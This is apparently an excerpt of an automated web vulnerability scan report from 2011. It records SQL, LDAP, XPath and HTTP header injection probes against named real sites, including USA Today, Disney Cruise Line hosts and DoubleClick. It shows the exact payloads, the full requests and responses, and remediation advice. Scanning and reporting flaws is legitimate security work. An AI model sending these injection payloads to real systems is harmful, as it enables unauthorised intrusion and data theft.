HTTP/1.1 200 OK
P3P: policyref="http://serv.adspeed.com/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID"
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Mon, 16 May 2011 01:21:36 GMT
Server: AdSpeed/s3
Content-Length: 2104

<html><head><title>Mouse Fan Travel</title><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js" ></script>
</head><body leftmargin=0 topmargin=0 marginw
...[SNIP]...
<img style="border:0px;" src="http://serv.adspeed.com/ad.php?do=error&type=-7&wd=468&ht=60" alt="i" />
...[SNIP]...

Request 2

GET /ad.php?do=html&zid=3253&wd=468&ht=60&tz=5&ck=Y&jv=Y&scr=1920x1200x32&ref=&r=0.505050992593/1%2527%25271692 HTTP/1.1
Host: serv.adspeed.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://serv.adspeed.com/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID"
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Mon, 16 May 2011 01:21:36 GMT
Server: AdSpeed/s3
Content-Length: 1705

<html><head><title>Advertisement</title></head><body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style="background-color:transparent"><html>

<head>
<meta name="GENERATOR" content="Micros
...[SNIP]...

1.9. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [widget_path parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The widget_path parameter appears to be vulnerable to SQL injection attacks. The payloads 20459079'%20or%201%3d1--%20 and 20459079'%20or%201%3d2--%20 were each submitted in the widget_path parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app20459079'%20or%201%3d1--%20&plckcommentonkeytype=article&plckcommentonkey=169725.blog&clientUrl=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; USATINFO=Handle%3D; usatprod=R1449728009

Response 1

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Cache-Control: private
Content-Length: 89530
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm4l3pluckcom
Set-Cookie: SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 16 May 2011 01:30:06 GMT
Connection: close

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
<div id=\"pluck_user_miniPersona_dialog_38586\" class=\"pluck-user-mp-dialog\" >\r\n\t<div class=\"pluck-user-mp-qtip-style\" style=\"display:none;\"><\/div>\r\n\t<div class=\"pluck-user-mp-wrap\">\r\n\t\t<div class=\"pluck-user-mp-sidebar\">\r\n\t\t\t<div class=\"pluck-user-mp-avatar-seethrough\">\r\n\t\t\t\t<a href=\"#\"><img alt=\"\" class=\"pluck-user-mp-avatarimg\" \/><\/a>\r\n\t\t\t<\/div>\r\n\r\n\t\t<\/div>\r\n\t\t<div class=\"pluck-user-mp-wait\">\r\n\t\t\t<div class=\"pluck-user-mp-wait-modal\">&nbsp;<\/div>\r\n\t\t\t<div class=\"pluck-user-mp-wait-msg\"><img src=\"http:\/\/sitelife.usatoday.com\/ver1.0\/Content\/ua\/images\/throbber.gif\"\/><br\/>Please wait while we process your request<\/div>\r\n\t\t<\/div>\r\n\t\t<div class=\"pluck-user-mp-loading\">\r\n\t\t\t<div class=\"pluck-user-mp-loading-modal\">&nbsp;<\/div>\r\n\t\t\t<div class=\"pluck-user-mp-loading-msg\"><img src=\"http:\/\/sitelife.usatoday.com\/ver1.0\/Content\/ua\/images\/throbber.gif\"\/><br\/>Please wait while we retrieve the user\'s information<\/div>\r\n\t\t<\/div>\r\n\t\t<div class=\"pluck-user-mp-content\">\r\n\t\t\t<h4 class=\"pluck-user-mp-username\"><a href=\"#\"><span class=\"pluck-user-mp-username-value\"><\/span><\/a><\/h4>\r\n\t\t\t<p class=\"pluck-user-mp-asl\"><\/p>\r\n\t\t\t<div class=\"pluck-user-mp-activity-area\">\r\n\t\t\t\t<p class=\"pluck-user-mp-info\"><span class=\"pluck-user-mp-sub-head\">Bio<\/span><span class=\"pluck-user-mp-text pluck-user-mp-bio\"><\/span><\/p>\r\n\t\t\t\t<p class=\"pluck-user-mp-info\"><span class=\"pluck-user-mp-no-bio\">Your bio is currently empty. Now is a great time to <a href=\"#\">fill in your profile<\/a>.<\/span><\/p>\r\n\r\n\t\t\t\t<p class=\"pluck-user-mp-private-info\">This profile is private.<\/p>\r\n\r\n\t\t\t\t<p class=\"pluck-user-mp-sharedWithFriends-info\">This profile is only shared with friends.<\/p>\r\n\r\n\t\t\t\t<p class=\"pluck-user-mp-abusive-info\">This profile is under review.<\/p>\r\n\t\t\t\t<p class=\"pluck-error-message pluck-user-mp-error-detail\" style=
...[SNIP]...

Request 2

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app20459079'%20or%201%3d2--%20&plckcommentonkeytype=article&plckcommentonkey=169725.blog&clientUrl=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; USATINFO=Handle%3D; usatprod=R1449728009

Response 2

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Cache-Control: private
Content-Length: 89540
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm4l3pluckcom
Set-Cookie: SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 16 May 2011 01:30:07 GMT
Connection: close

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
<div id=\"pluck_user_miniPersona_dialog_26019\" class=\"pluck-user-mp-dialog\" >\r\n\t<div class=\"pluck-user-mp-qtip-style\" style=\"display:none;\"><\/div>\r\n\t<div class=\"pluck-user-mp-wrap\">\r\n\t\t<div class=\"pluck-user-mp-sidebar\">\r\n\t\t\t<div class=\"pluck-user-mp-avatar-seethrough\">\r\n\t\t\t\t<a href=\"#\"><img alt=\"\" class=\"pluck-user-mp-avatarimg\" \/><\/a>\r\n\t\t\t<\/div>\r\n\r\n\t\t<\/div>\r\n\t\t<div class=\"pluck-user-mp-wait\">\r\n\t\t\t<div class=\"pluck-user-mp-wait-modal\">&nbsp;<\/div>\r\n\t\t\t<div class=\"pluck-user-mp-wait-msg\"><img src=\"http:\/\/sitelife.usatoday.com\/ver1.0\/Content\/ua\/images\/throbber.gif\"\/><br\/>Please wait while we process your request<\/div>\r\n\t\t<\/div>\r\n\t\t<div class=\"pluck-user-mp-loading\">\r\n\t\t\t<div class=\"pluck-user-mp-loading-modal\">&nbsp;<\/div>\r\n\t\t\t<div class=\"pluck-user-mp-loading-msg\"><img src=\"http:\/\/sitelife.usatoday.com\/ver1.0\/Content\/ua\/images\/throbber.gif\"\/><br\/>Please wait while we retrieve the user\'s information<\/div>\r\n\t\t<\/div>\r\n\t\t<div class=\"pluck-user-mp-content\">\r\n\t\t\t<h4 class=\"pluck-user-mp-username\"><a href=\"#\"><span class=\"pluck-user-mp-username-value\"><\/span><\/a><\/h4>\r\n\t\t\t<p class=\"pluck-user-mp-asl\"><\/p>\r\n\t\t\t<div class=\"pluck-user-mp-activity-area\">\r\n\t\t\t\t<p class=\"pluck-user-mp-info\"><span class=\"pluck-user-mp-sub-head\">Bio<\/span><span class=\"pluck-user-mp-text pluck-user-mp-bio\"><\/span><\/p>\r\n\t\t\t\t<p class=\"pluck-user-mp-info\"><span class=\"pluck-user-mp-no-bio\">Your bio is currently empty. Now is a great time to <a href=\"#\">fill in your profile<\/a>.<\/span><\/p>\r\n\r\n\t\t\t\t<p class=\"pluck-user-mp-private-info\">This profile is private.<\/p>\r\n\r\n\t\t\t\t<p class=\"pluck-user-mp-sharedWithFriends-info\">This profile is only shared with friends.<\/p>\r\n\r\n\t\t\t\t<p class=\"pluck-user-mp-abusive-info\">This profile is under review.<\/p>\r\n\t\t\t\t<p class=\"pluck-error-message pluck-user-mp-error-detail\" style=
...[SNIP]...

2. LDAP injection  previous  next
There are 2 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://dcl.wdpromedia.com
Path:   /reservations/concat/2.39.0.9/css

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=*/concat/2.39.0.9/css?files=/nonGlobal/pleaseWait.css HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/reservations/customize?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:35:36 GMT
Content-Length: 102652
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<div id="DOLChrome">


       <div id="gde_chromeData" class="gde_chromeData">
   <div id="gde_chromeDataHome">
       <a href="http://disney.go.com" title="Disney.com">Disney.com</a>
   </div>
   <div id="gde_chromeDataRows">
       <div id="gde_chromeDataTopRow">
           <ul>
               <li><a id="movies" href="http://disney.go.com/movies/index" title="Movies">Movies</a></li>
               <li><a id="tv" href="http://tv.disney.go.com/tv" title="TV">TV</a></li>
               <li><a id="music" href="http://disney.go.com/music/index" title="Music">Music</a></li>
               <li><a id="live_events" href="http://disney.go.com/live-events/index" title="Live Events">Live Events</a></li>
               <li><a id="books" href="http://disney.go.com/books/index" title="Books">Books</a></li>
               <li><a id="parks" href="http://disneyparks.disney.go.com/" title="Parks & Travel">Parks & Travel</a></li>
               <li><a id="store" href="http://www.disneystore.com/transfer/526272/?CMP=OTL-Dcom:ChrmShpTb" title="Store">Store</a></li>
           </ul>
       </div>
       <div id="gde_chromeDataBottomRow">
           <ul>
               <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go.com/characters/#/characters/" title="Characters & Stars">Characters & Stars</a></li>
               <li><a id="games" iconId="iconGames" channelId="153603" href="http://disney.go.com/games/#/games/" title="Games">Games</a></li>
               <li><a id="videos" iconId="iconVideos" channelId="153585" href="http://disney.go.com/videos/#/videos/" title="Videos">Videos</a></li>
               <li><a id="create" iconId="iconCreate" channelId="307445" href="http://disney.go.com/create/#/create/" title="Create">Create</a></li>
               <li><a id="my_page" iconId="iconMyPage" channelId="153582" href="http://disney.go.com/mypage/#/mypage/" title="My Page">My Page</a></li>
           </ul>
       </div>
   </div>
   <div id="gde_chromeDataSearch">
       <a href="http://disney.go.com/search/?q=" searchURL="http://disney.go.com/search" title="Search Disney.com">Search Disney.com</a>
   </div>
</div>
<script language="javascript" type="text/javascript">
var _gdeChrome = ne
...[SNIP]...

Request 2

GET /*)!(sn=*/concat/2.39.0.9/css?files=/nonGlobal/pleaseWait.css HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/reservations/customize?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:35:36 GMT
Content-Length: 33408
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<div id="DOLChrome">


           </div><div id="bodyContainer">

<div id="loginRegForm" class="yui-navset">
   <ul class="yui-nav clearfix">
       <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li>
       <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li>
   </ul>
   <div class="yui-content">
       <div id="loginForm" class="flyoutForm">
           <form method="post" action="/login/" id="loginFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd>
                   <dt><label for="loginPassword">Password:</label></dt>
                   <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput"maxlength="25" value="" /></dd>
                   <dd class="loginFormSubmit"><input type="image" src="http://dcl.wdpromedia.com/media/dcl_v0400/Global/globalHeader/buttonLoginSubmit.png" name="submit" value="Login" /></dd>
                   <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forgot your password?</a></dd>
                   <dd class="extraLinks"><a href="/register/" title="Don't have a log in? Register Now">Don't have a log in? Register Now</a></dd>
               </dl>
           </form>
       </div>
       <div id="forgotPassForm" class="flyoutForm">
           <form method="post" action="/forgot-password/" id="forgotPasswordFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="memberName" class="formInput" value="" /></dd>
                   <dt><label for="flyoutLastName">Last Name:</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="flyoutLastName" name="lastName" class="formInput" value="" /></dd>
                   <dt><label for="birthDay">Your Birthday:</label></dt>
               <dd class="required birthday">
                       <select name
...[SNIP]...

2.2. http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=*/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg?t=1245453798364 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:50 GMT
Content-Length: 102660
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<div id="DOLChrome">


       <div id="gde_chromeData" class="gde_chromeData">
   <div id="gde_chromeDataHome">
       <a href="http://disney.go.com" title="Disney.com">Disney.com</a>
   </div>
   <div id="gde_chromeDataRows">
       <div id="gde_chromeDataTopRow">
           <ul>
               <li><a id="movies" href="http://disney.go.com/movies/index" title="Movies">Movies</a></li>
               <li><a id="tv" href="http://tv.disney.go.com/tv" title="TV">TV</a></li>
               <li><a id="music" href="http://disney.go.com/music/index" title="Music">Music</a></li>
               <li><a id="live_events" href="http://disney.go.com/live-events/index" title="Live Events">Live Events</a></li>
               <li><a id="books" href="http://disney.go.com/books/index" title="Books">Books</a></li>
               <li><a id="parks" href="http://disneyparks.disney.go.com/" title="Parks & Travel">Parks & Travel</a></li>
               <li><a id="store" href="http://www.disneystore.com/transfer/526272/?CMP=OTL-Dcom:ChrmShpTb" title="Store">Store</a></li>
           </ul>
       </div>
       <div id="gde_chromeDataBottomRow">
           <ul>
               <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go.com/characters/#/characters/" title="Characters & Stars">Characters & Stars</a></li>
               <li><a id="games" iconId="iconGames" channelId="153603" href="http://disney.go.com/games/#/games/" title="Games">Games</a></li>
               <li><a id="videos" iconId="iconVideos" channelId="153585" href="http://disney.go.com/videos/#/videos/" title="Videos">Videos</a></li>
               <li><a id="create" iconId="iconCreate" channelId="307445" href="http://disney.go.com/create/#/create/" title="Create">Create</a></li>
               <li><a id="my_page" iconId="iconMyPage" channelId="153582" href="http://disney.go.com/mypage/#/mypage/" title="My Page">My Page</a></li>
           </ul>
       </div>
   </div>
   <div id="gde_chromeDataSearch">
       <a href="http://disney.go.com/search/?q=" searchURL="http://disney.go.com/search" title="Search Disney.com">Search Disney.com</a>
   </div>
</div>
<script language="javascript" type="text/javascript">
var _gdeChrome = ne
...[SNIP]...

Request 2

GET /*)!(sn=*/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg?t=1245453798364 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:50 GMT
Content-Length: 33416
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<div id="DOLChrome">


           </div><div id="bodyContainer">

<div id="loginRegForm" class="yui-navset">
   <ul class="yui-nav clearfix">
       <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li>
       <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li>
   </ul>
   <div class="yui-content">
       <div id="loginForm" class="flyoutForm">
           <form method="post" action="/login/" id="loginFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd>
                   <dt><label for="loginPassword">Password:</label></dt>
                   <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput"maxlength="25" value="" /></dd>
                   <dd class="loginFormSubmit"><input type="image" src="http://dcl.wdpromedia.com/media/dcl_v0400/Global/globalHeader/buttonLoginSubmit.png" name="submit" value="Login" /></dd>
                   <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forgot your password?</a></dd>
                   <dd class="extraLinks"><a href="/register/" title="Don't have a log in? Register Now">Don't have a log in? Register Now</a></dd>
               </dl>
           </form>
       </div>
       <div id="forgotPassForm" class="flyoutForm">
           <form method="post" action="/forgot-password/" id="forgotPasswordFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="memberName" class="formInput" value="" /></dd>
                   <dt><label for="flyoutLastName">Last Name:</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="flyoutLastName" name="lastName" class="formInput" value="" /></dd>
                   <dt><label for="birthDay">Your Birthday:</label></dt>
               <dd class="required birthday">
                       <select name
...[SNIP]...

3. XPath injection  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://travel.usatoday.com
Path:   /cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /cruises/post'/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1 HTTP/1.1
Host: travel.usatoday.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 16 May 2011 01:20:15 GMT
Content-Length: 3080

<b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString()<br/> at MS.Internal.Xml.XPath.XPathScanner.NextLex()<br/> at MS.Internal.Xml.XPath.XPathParser.ParsePri
...[SNIP]...
<br/> at System.Xml.XPath.XPathExpression.Compile(String xpath, IXmlNamespaceResolver nsResolver)<br/>
...[SNIP]...

4. HTTP header injection  previous  next
There are 9 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/tmg.telegraph.sponsored/sponsored.travel

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 678b5%0d%0a8384566a10f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /678b5%0d%0a8384566a10f/tmg.telegraph.sponsored/sponsored.travel;at=header;pos=1;sc=sponsored-travel;pt=story;pg=8509794;lvl=3;biw=1136;bih=902;fv=10;sz=1x1;tile=1;ord=1305509216094? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/8509794/Win-a-fantastic-holiday-to-Walt-Disney-World-Florida-and-a-Disney-Cruise-in-the-Bahamas.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
